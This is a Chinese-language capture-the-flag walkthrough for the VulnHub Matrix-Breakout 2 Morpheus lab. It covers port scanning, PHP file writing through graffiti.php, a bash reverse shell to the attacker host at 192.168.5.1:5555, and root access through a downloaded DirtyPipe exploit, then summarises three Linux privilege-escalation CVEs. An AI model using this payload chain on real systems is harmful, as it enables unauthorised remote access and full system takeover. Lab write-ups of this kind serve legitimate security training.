vulnhub靶场Matrix-win全流程

Matrix-Breakout 2 Morpheus(win操作)

如果靶场出现发送数据包无响应的情况,请重启服务器

靶机下载地址:

https://download.vulnhub.com/matrix-breakout/c-2-morpheus.ova

攻击机:win11(192.168.5.1)

信息收集

本地虚拟机加载后,并不知道具体的IP地址,所以要进行主机探测(确定好C段)

主机发现(nmap)

nmap 192.168.5.1-255

在这里插入图片描述

发现主机192.168.5.134

对主机进行扫描,并生成attck.xml报告

nmap 192.168.5.134 -Pn -sS -p- -A -oX attack.xml

可以看到发现了22,80,81 的端口
在这里插入图片描述

对开放的端口进行简单的漏洞扫描

nmap 192.168.5.134 -p 22,80,81 --script=vuln

测试了一个CVE-2011-1002,没有什么用

还发现了一个robots.txt

在这里插入图片描述

访问主页,让后再看一下robts.txt。显示没有任何信息

在这里插入图片描述
在这里插入图片描述

目录扫描

使用扫描工具扫描到/graffiti.php页面(扫描器趴窝没找到,根据官方提示找到的),这里可以使用dirseach\dirb\dirbuster,加强大的字典找到

漏洞探测

查看页面,在Message出输入内容可以显示在页面上,还可以测个xss()存储型
在这里插入图片描述

拿burp抓一下流量包,还是老样子全流量

在这里插入图片描述

在这里插入图片描述

发送到repeater的进行操作,发现file文件名可控,message内容可控。写个test.php试一试,内容

<?php phpinfo();?>

在这里插入图片描述

在这里插入图片描述

成功显示phpinfo页面。查看disdisable_functions

在这里插入图片描述

获取SHELL

下一步可以上传一句话木马,使用蚂蚁剑或者冰蝎连接。这里直反弹shell了

php文件内容

<?php exec("/bin/bash -c '/bin/bash -i >& /dev/tcp/192.168.5.1/5555 0>&1'");?>

进行一次url(不然发过去数据会被截断)

%3C%3Fphp%20exec(%22%2Fbin%2Fbash%20-c%20'%2Fbin%2Fbash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.5.1%2F5555%200%3E%261'%22)%3B%3F%3E

填写到burp里,本地监听5555端口,然后点击发送。稍微等一会就会收到数据。(如果不小心断掉了,重新监听,然访问页面刷新,就会收到反弹)

在这里插入图片描述

在这里插入图片描述

shell反弹回来后,分别执行下面命令whoamiidpwd

可以看到权限有点低,进行提权

在这里插入图片描述

权限提升

提权探测

脚本地址
https://github.com/carlospolop/PEASS-ng/releases/download/20230305/linpeas_linux_amd64

使用python开启一个临时web服务进行操作,让靶机下载。本地进行访问,可以访问到

在这里插入图片描述

在这里插入图片描述

在反弹shell处操作,拿到提权脚本,然后给linux权限并执行

 wget http://192.168.5.1:8000/linuxchmod +x linux ./linux

稍等一会,就会出来可利用的提权脚本

在这里插入图片描述

在这里插入图片描述

可以看到可利用的CVE(因为个人环境原因会乱码,用kali进行操作就不会)

在这里插入图片描述

使用CVE-2022-0847(DirtyPipe)这个很出名的一个linux提权脚本,下载并进行利用(本次利用是在靶场环境编译的,理论上要在本地进行编译,然后上传exploit进行使用,实战当中目标可能没有环境无法编译

github地址
https://github.com/Arinerron/CVE-2022-0847-DirtyPipe-Exploit使用方法Compile with ./compile.sh (assumes gcc is installed)Run ./exploit and it'll pop a root shell

将这个文件放到pthon的web服务下

在这里插入图片描述

反弹的shell窗口wget下载并给权限,然后利用

wget http://192.168.5.1:8000/exploit.c
wget http://192.168.5.1:8000/compile.sh
chmod +x exploit.c
chmod +x compile.sh
./compile.sh
./exploit

在这里插入图片描述

在这里插入图片描述

当执行完毕时,靶机的root密码被修改为aaron ,su root进入root用户,拿到最高权限

在这里插入图片描述

默认的shell并不好看 使用bash -i ,可以优化一下

在这里插入图片描述

获取FLAG

拿到flag,查找全部flag.txt文件

 find -iname flag.txt

在这里插入图片描述

在根目录下拿到FLAG.txt

在这里插入图片描述

在cypher目录下拿到FLAG

在这里插入图片描述

在root目录下拿到FLAG

在这里插入图片描述

执行下列命令可以恢复原来的密码

mv /tmp/passwd.bak /etc/passwd

总结

​ 本次重点使用了一个提权脚本CVE-2022-0847(DirtyPipe),可以看一下这个的原理,在实战当中,也是有很大概率存在。还有两个也是很常用的存在CVE-2022-2588(Linux Kernel 权限提升漏洞)CVE-2021-4034(Linux Polkit 本地权限提升),在之前未更新补丁的linux的基本是通杀

CVE-2022-0847

​ 安全研究员 Max 提出一个 Linux 内核提权漏洞 CVE-2022-0847,攻击者可以利用该漏洞实现低权限用户提升至 root 权限,且能对主机任意可读文件进行读写。该漏洞在原理上与2016年10月18日由黑客 Phil Oester 提出的 “Dirty Cow”脏牛漏洞类似,由于本质上是由于 Kernel 内核中编写的匿名管道限制不严导致的问题,所以将其命名为 “DirtyPipe”,中文音译为:脏管漏洞(或 脏管道漏洞)

漏洞影响范围:
Linux Kernel版本 >= 5.8
Linux Kernel版本 < 5.16.11 / 5.15.25 / 5.10.102CentOS 8 默认内核版本受该漏洞影响
CentOS 7 及以下版本不受影响

CVE-2021-4034

​ Linux Polkit 权限提升,在 polkit 的 pkexec 中发现存在的本地权限提升漏洞(CVE-2021-4034)。Polkit(以前称为 PolicyKit)是一个用于在类 Unix 操作系统中控制系统范围权限的组件。它为非特权进程与特权[程通信提供了一种有组织的方式。也可以使用 polkit 执行具有提升权限的命令,使用命令 pkexec 后跟要执行的命令(具有 root 权限)

漏洞影响范围:Debain stretch policykit-1 < 0.105-18+deb9u2Debain buster policykit-1 < 0.105-25+deb10u1Debain bookworm, bullseye policykit-1 < 0.105-31.1Ubuntu 21.10 (Impish Indri) policykit-1 < 0.105-31ubuntu0.1Ubuntu 21.04 (Hirsute Hippo) policykit-1 Ignored (reached end-of-life)Ubuntu 20.04 LTS (Focal Fossa) policykit-1 < 0.105-26ubuntu1.2)Ubuntu 18.04 LTS (Bionic Beaver) policykit-1 <0.105-20ubuntu0.18.04.6)Ubuntu 16.04 ESM (Xenial Xerus) policykit-1 <0.105-14.1ubuntu0.5+esm1)Ubuntu 14.04 ESM (Trusty Tahr) policykit-1 <0.105-4ubuntu3.14.04.6+esm1)CentOS 6 polkit < polkit-0.96-11.el6_10.2CentOS 7 polkit < polkit-0.112-26.el7_9.1CentOS 8.0 polkit < polkit-0.115-13.el8_5.1CentOS 8.2 polkit < polkit-0.115-11.el8_2.2CentOS 8.4 polkit < polkit-0.115-11.el8_4.2

CVE-2022-2588

​ Linux kernel是开源操作系统Linux所使用的内核。在Linux 内核的 net/sched/cls_route.c 实现的 route4_change 中发现了一个存在 use-after-free 缺陷漏洞,该漏洞源于释放后重用,本地攻击者利用该漏洞会导致系统崩溃,可能会造成本地特权升级问题。

​ (高版本也可能存在的问题

漏洞影响范围:Linux:Kernel	>= v2.6.12-rc2	>= v5.19

Ubuntu22.04下POC验证测试

https://www.cnblogs.com/cherishthepresent/p/16767382.html

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.xdnf.cn/news/1545557.html

如若内容造成侵权/违法违规/事实不符,请联系一条长河网进行投诉反馈,一经查实,立即删除!

相关文章

React学习笔记(四)——React 组件生命周期

目录 1. 生命周期-概览 2. 生命周期-挂载阶段 3. 生命周期-更新阶段 4. 生命周期-卸载阶段 5. setState扩展-发现问题 6. setState扩展-更多用法 7. setState扩展-异步 1. 生命周期-概览 了解react类组件生命周期整体情况 大致步骤&#xff1a; 什么是生命周期React类组…

C盘空间不足--WizTree(管理空间)

WizTree&#xff1a;高效的磁盘空间分析工具 在日常使用电脑的过程中&#xff0c;磁盘空间的管理常常成为一个棘手的问题。随着文件的不断增加&#xff0c;我们的硬盘空间逐渐被占满&#xff0c;而这些文件中有很多其实并不重要。为了帮助用户更好地管理磁盘空间&#xff0c;Wi…

已存在的Python项目使用依赖管理工具UV

1. 文档 uv文档 2. 如何转换 初始化 uv initrequirements.txt转换成pyproject.toml uv add $(cat requirements.txt)删除requirements.txt 如果更新pyproject.toml之后&#xff0c;使用命令 uv sync替换项目环境 如果有库没有加入依赖&#xff0c;自己手动加一下&am…

美化网页,特效

当阅读博客园的文章时&#xff0c;经常看到精美的特效 博客园美化 - 凌云 - 博客园 (cnblogs.com) 简直不要太好看 自己写了一个前后端分离的网站后&#xff0c;想着应用这些特效&#xff0c;毕竟别人看到特效后逼格还是挺高的 于是&#xff0c;我F12把代码拿了下来 【手动狗…

普通人想自学AI产品经理,我劝你谨慎!

随着大模型技术的快速发展&#xff0c;市面上涌现出了大量的大模型产品岗位&#xff0c;那么想要进入AI行业的产品经理同学&#xff0c;需要提前做好哪些准备工作呢&#xff1f;这篇文章里&#xff0c;作者总结了入行AI的必备知识&#xff0c;包括市场调研、产品底层逻辑等内容…

逆概率加权(R和Python案例)

逆概率加权&#xff08;Inverse Probability Weighting, IPW&#xff09;是一种统计技术&#xff0c;用于观察性研究中调整混杂变量的影响&#xff0c;以便更准确地估计因果关系。这种方法特别有用于在无法进行随机化实验的情况下&#xff0c;通过给予不同个体不同的权重&#…

2024年9月最新web3开发人员薪资情况(包括不同语言、各个国家)

2024年9月最新web3非开发人员薪资情况&#xff08;包括不同语言、各个国家&#xff09; 开发人员的薪水是多少&#xff1f; Web3 开发人员的平均年薪为 14 万至 20 万美元。 量化开发人员每年可赚 20 万至 30 万美元 高级开发人员年薪 16 万至 25.7 万美元 北美开发商年薪 …

了解云计算工作负载保护的重要性,确保数据和应用程序安全

云计算de小白 云计算技术的快速发展使数据和应用程序安全成为一种关键需求&#xff0c;而不仅仅是一种偏好。随着越来越多的客户公司将业务迁移到云端&#xff0c;保护他们的云工作负载&#xff08;指所有部署的应用程序和服务&#xff09;变得越来越重要。云工作负载保护&…

可视掏耳勺鸡肋吗?高清可视掏耳勺牌子推荐!

很多人习惯在洗漱完顺手拿一根棉签掏耳朵&#xff0c;但是棉签的表面直径大且粗糙&#xff0c;不易将耳朵深处的耳垢挖出&#xff0c;耳垢堆积在耳道深处长时间不清理会导致堵塞耳道&#xff0c;引起耳鸣甚至感染。而可视掏耳勺作为一种新型的挖耳工具&#xff0c;它的安全性也…

【java常见面试题】

IO 按照流的流向分类&#xff1a;输入流和输出流 按照操作单元分类&#xff1a;可以分为字节流和字符流 按照流的角色划分&#xff1a;节点流和处理流 所有输入流的基类&#xff1a;InputStream/Reader 字节流/字符流 所有输出流的基类&#xff1a;OutputStream/Reader 字…

用友或畅捷通设置外网访问,使用的是神卓互联内网穿透

本文将详细介绍如何使用神卓互联内网穿透技术搭建单位用友软件的访问环境&#xff0c;以实现远程办公和管理的高效便捷。 目录 一、神卓互联内网穿透技术 二、准备工作 1. 注册神卓互联账号 2. 配置用友软件服务器 三、配置神卓互联内网穿透 1. 安装并启动神卓互联客户端…

吉客云与金蝶云星空对接集成分页查询货品信息连通[标准]

吉客云与金蝶云星空对接集成分页查询货品信息连通[标准][付款单新增]-v1(付款单) 对接系统&#xff1a;吉客云 “吉客云”是一站式企业数字化解决方案系统&#xff0c;可实现业务、财务、办公、人事等一体化管理。相对于传统多套软件系统的集成方案&#xff0c;“吉客云”具有业…

【程序员提效】AI助力程序员提效:如何让AI编写代码+调试复杂代码教程

在编程的旅途中&#xff0c;程序员们常常面临各种挑战&#xff0c;尤其是在编写和维护代码时&#xff0c;难题层出不穷。&#x1f914; 尽管传统搜索引擎提供了海量信息&#xff0c;但往往让我们在无尽的例子和复杂分析中迷失&#xff0c;难以找到真正适合自己的解决方案。正因…

韦唯出席平遥国际电影展开幕式 中英文歌曲连唱尽显国际范

9月24日&#xff0c;第八届平遥国际电影展在在山西省晋中市平遥古城正式开幕。韦唯作为特邀演出嘉宾&#xff0c;参加开幕式晚会并演唱《黄土地》主题曲《女儿歌》及自己的英文单曲《All there is》两首歌曲。 韦唯刚结束“湾区升明月”2024大湾区电影音乐晚会&#xff0c;就马…

Cloudera 安装不再难:下载安装全流程指南

引言&#xff1a;之前文章《深度挖掘&#xff5c;Cloudera安装不再难&#xff01;基础环境搭建全解析》中&#xff0c;我们深入探讨了如何在企业环境中精心准备系统环境&#xff0c;为大数据平台Cloudera 搭建奠定坚实基础。今天&#xff0c;我们将正式进行Cloudera Manager的下…

出国留学:如何选对专业,匹配你的职业目标?

在全球化日益加深的今天&#xff0c;出国留学已成为许多青年学子拓宽视野、提升竞争力的重要途径。然而&#xff0c;面对琳琅满目的专业选择&#xff0c;如何找到既符合个人兴趣又能助力未来职业发展的专业&#xff0c;成为了每位准留学生必须面对的挑战。本文将为您详细解析&a…

828华为云征文 | 云服务器Flexus X实例,Docker集成搭建 Jupyter Notebook

828华为云征文 | 云服务器Flexus X实例&#xff0c;Docker集成搭建 Jupyter Notebook Docker 部署 Jupyter Notebook 是一个方便且快速的方式&#xff0c;可以帮助你搭建一个用于数据分析、机器学习和科学计算的环境 华为云端口放行 服务器放行对应端口9955 Docker安装并配置镜…

unraid使用docker安装redis并创建密码

unraid使用docker安装redis并创建密码 一、redis简单介绍 redis基于K-V思路&#xff0c;数据存储在内存中&#xff0c;速度快&#xff0c;高效。 使用时会结合其他数据库如mysql。 二、redis安装 应用市场搜索redis&#xff0c;找下载量最高的一个即可&#xff0c;其中参数只…

大数据Hive组件安装

组件版本 组件版本Hadoop3.3.0JDK1.8.0_241Mysql5.7.25Hive3.1.2 Hadoop集群服务分布 Node1Node2Node3NameNode DataNode DataNodeDataNode NodeManager NodeManagerResourceManagerSecondaryNameNode 安装前请确定Hadoop集群服务全部启动&#xff0c;不然后续测试时会报…

2024年信息学奥赛CSP-J初赛真题详细分析

CSP-J 2024 入门组初赛第一轮初赛试题及答案解析 一、 单项选择题&#xff08;共15题&#xff0c;每题2分&#xff0c;共计30分&#xff1a;每题有且仅有一个正确选项&#xff09; 1 32 位 int 类型的存储范围是&#xff08; &#xff09; A -2147483647 ~ 2147483647B -214…